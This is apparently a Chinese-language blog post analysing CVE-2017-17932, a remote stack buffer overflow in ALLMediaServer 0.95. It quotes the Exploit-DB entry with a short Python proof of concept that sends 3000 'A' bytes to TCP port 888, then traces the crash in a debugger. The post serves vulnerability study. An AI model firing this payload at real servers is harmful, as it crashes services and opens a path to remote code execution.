[CVE-2017-17932] ALLMediaServer 0.95 远程溢出漏洞分析
0x00 参考
https://www.exploit-db.com/exploits/43406/
# Exploit Title: Buffer overflow in ALLPlayer ALLMediaServer 0.95 and earlier
https://www.exploit-db.com/exploits/43406/
# Exploit Title: Buffer overflow in ALLPlayer ALLMediaServer 0.95 and earlier
# CVE: CVE-2017-17932# Date: 27-12-2017 # Exploit Author: Aloyce J. Makalanga# Contact: https://twitter.com/aloycemjr# Vendor Homepage: http://www.allmediaserver.org/# Category: webapps# Attack Type: Remote# Impact: Code execution and/or Denial of Service #1. Description##A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 88. Te exploit this vulnerability, an attacker must connect to the server with a long-malicious string.## #2. Proof of Concept# #!/usr/bin/python#NOTE: I found this bug via patch-diffing and I had IDA Pro set up as my Just-In-Time debugger at the time of the crash but any debugger should work. def main(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('192.168.205.131', 888)) buffer = "A" * 3000 s.send(buffer) s.close()if __name__ == '__main__': import socket main()
将192.168.205.131改为自己的ip
0x01 漏洞分析
复现环境(windows10,python2.7.0)
启动ALLMediaServer,用调试器附加MediaServer.exe,用poc向127.0.0.1:888发送TCP请求,触发漏洞(MediaServer.exe崩溃)
可以看出当前栈被0x41覆盖了
根据崩溃的那个点buf = 0534F910(这个值会变化的)找到触发漏洞地方
发送第一次请求
buf里的内容,并没有溢出,只是服务端初始化了一些数据
先对这个地址下硬件断点,再发第2次请求,这是会断到某个位置(accept函数里)
一直单步,来到接收数据那块地方
步入
可以看到接收到的数据,全部读取到buf里,造成了溢出
评论
发表评论